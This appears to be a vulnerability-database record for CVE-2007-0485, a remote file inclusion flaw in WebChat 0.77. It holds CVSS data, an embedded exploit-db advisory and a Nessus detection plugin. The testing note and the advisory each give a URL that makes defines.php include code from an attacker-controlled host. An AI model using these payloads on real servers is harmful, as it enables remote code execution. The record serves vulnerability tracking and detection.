ID OSVDB:36689
Type osvdb
Reporter OSVDB
Modified 2007-01-21T00:00:00
Description
Manual Testing Notes
Http://[victim/[webchat-077_path]/defines.php?WEBCHATPATH=http://[attacker]/[code]?
References:
ISS X-Force ID: 31624
Generic Exploit URL: http://milw0rm.com/exploits/3169
CVE-2007-0485
Bugtraq ID: 22153
{"bulletinFamily": "software", "viewCount": 13, "reporter": "OSVDB", "references": [], "description": "## Manual Testing Notes\nHttp://[victim/[webchat-077_path]/defines.php?WEBCHATPATH=http://[attacker]/[code]?\n## References:\nISS X-Force ID: 31624\nGeneric Exploit URL: http://milw0rm.com/exploits/3169\n[CVE-2007-0485](https://vulners.com/cve/CVE-2007-0485)\nBugtraq ID: 22153\n", "affectedSoftware": [], "href": "https://vulners.com/osvdb/OSVDB:36689", "modified": "2007-01-21T00:00:00", "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2017-04-28T13:20:32", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0485"]}, {"type": "nessus", "idList": ["WEBCHAT_CODE_INJECTION.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:3169"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7088"]}], "modified": "2017-04-28T13:20:32", "rev": 2}, "vulnersScore": 7.3}, "id": "OSVDB:36689", "title": "WebChat defines.php WEBCHATPATH Variable Remote File Inclusion", "edition": 1, "published": "2007-01-21T00:00:00", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2007-0485"], "lastseen": "2017-04-28T13:20:32"}
{"cve": [{"lastseen": "2021-02-02T05:31:20", "description": "PHP remote file inclusion vulnerability in defines.php in WebChat 0.77 allows remote attackers to execute arbitrary PHP code via a URL in the WEBCHATPATH parameter.", "edition": 4, "cvss3": {}, "published": "2007-01-25T00:28:00", "title": "CVE-2007-0485", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0485"], "modified": "2018-10-16T16:32:00", "cpe": ["cpe:/a:webchat.org:webchat:0.77"], "id": "CVE-2007-0485", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0485", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:webchat.org:webchat:0.77:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T17:53:13", "description": "WebChat 0.77 (defines.php WEBCHATPATH) Remote File Include Vuln. CVE-2007-0485. Webapps exploit for php platform", "published": "2007-01-21T00:00:00", "type": "exploitdb", "title": "WebChat 0.77 defines.php WEBCHATPATH Remote File Include Vuln", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0485"], "modified": "2007-01-21T00:00:00", "id": "EDB-ID:3169", "href": "https://www.exploit-db.com/exploits/3169/", "sourceData": "######################################################################### \n# \n# [ webchat ] \n# \n# Class: File Include Vulnerability \n# Published 2007/1/21 \n# Remote: Yes \n# Critical Level : Dangerous \n# Site: http://www.easy-script.com/compt.php?id=1705 || http://sourceforge.net/projects/webdev-webchat/\n# Author: TheViper-hacker \n# Contact: theviper-hacker@hotmail.com \n# \n#########################################################################\nfile ;\nframe.php\n======================================================\nVuln Code\ninclude ($WEBCHATPATH.'language/english.php');\n=======================================================\nExploit : \nHttp:// www.Victem.0 / [ webchat-077_path] /defines.php?WEBCHATPATH=http://turnkringonzehoop.be/viper.txt?\n \n ---- Thanx: [MoHaNdKo] [Cold ThreE] [cold zero] [The Wolf KSA] ]organza[\n ---- GreeTz: All www.4azhar.Com Members Cont : rida-10@msn.com\n--------------------------------------|| Viva ISLAM ||-----------------------------------------\n\n# milw0rm.com [2007-01-21]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3169/"}], "nessus": [{"lastseen": "2021-01-20T15:48:28", "description": "The version of Webchat installed on the remote host allows an attacker\nto read local files or execute PHP code, possibly taken from third-\nparty sites, subject to the permissions of the web server user id.", "edition": 24, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2003-03-03T00:00:00", "title": "WebChat defines.php WEBCHATPATH Parameter Remote File Inclusion", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0485"], "modified": "2003-03-03T00:00:00", "cpe": [], "id": "WEBCHAT_CODE_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/11315", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# Ref:\n#\n# From: \"Frog Man\" <leseulfrog@hotmail.com>\n# To: bugtraq@securityfocus.com\n# Cc: vulnwatch@vulnwatch.org\n# Date: Mon, 03 Mar 2003 13:57:43 +0100\n# Message-ID: <F33JEyTeTaj1qNIFR2e000195ec@hotmail.com>\n# Subject: [VulnWatch] WebChat (PHP)\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(11315);\n script_version(\"1.25\");\n script_cve_id(\"CVE-2007-0485\");\n script_bugtraq_id(7000);\n\n script_name(english:\"WebChat defines.php WEBCHATPATH Parameter Remote File Inclusion\");\n script_summary(english:\"Checks for the presence of Webchat's defines.php\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by a\nremote code inclusion flaw.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of Webchat installed on the remote host allows an attacker\nto read local files or execute PHP code, possibly taken from third-\nparty sites, subject to the permissions of the web server user id.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/313606\" );\n script_set_attribute(attribute:\"solution\", value:\"Contact the vendor for a patch or remove the application.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2007-0485\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/03/03\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/01/21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port))exit(0);\n\n\n\nfunction check(loc)\n{\n local_var r, w;\n\n w = http_send_recv3(method:\"GET\", port: port, item:string(loc, \"/defines.php?WEBCHATPATH=http://example.com/\"));\n if (isnull(w)) exit(0);\n r = w[2];\n if(\"http://example.com/db_mysql.php\" >< r )\n {\n \tsecurity_hole(port);\n\texit(0);\n }\n}\n\n\nforeach dir (dirs)\n{\n check(loc:dir);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:22", "bulletinFamily": "software", "cvelist": ["CVE-2007-0549", "CVE-2007-0542", "CVE-2007-0485", "CVE-2007-0499", "CVE-2007-0502", "CVE-2007-0550", "CVE-2007-0501", "CVE-2007-0492"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2007-01-22T00:00:00", "published": "2007-01-22T00:00:00", "id": "SECURITYVULNS:VULN:7088", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7088", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
